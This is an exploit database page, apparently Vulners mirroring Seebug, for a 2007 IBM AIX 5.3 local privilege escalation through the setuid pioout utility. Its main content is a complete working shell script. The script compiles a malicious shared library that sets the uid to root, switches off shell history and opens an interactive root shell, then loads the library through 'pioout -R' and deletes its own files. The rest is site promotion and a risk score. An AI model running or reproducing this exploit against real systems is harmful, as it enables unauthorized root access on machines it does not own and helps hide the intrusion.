Lucene search
K

IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit

🗓️ 31 Jul 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 12 Views

IBM AIX 5.3 pioout Library Loading Root Exploi

Code

                                                #!/bin/sh
#
# 07/2007: public release
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
        seteuid(0);
        setuid(0);
        putenv("HISTFILE=/dev/null");
        execl("/bin/bash", "bash", "-i", (void *) 0);
        execl("/bin/sh", "sh", "-i", (void *) 0);
        perror("execl");
        exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib

# sebug.net
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Jul 2007 00:00Current
7.1High risk
Vulners AI Score7.1
12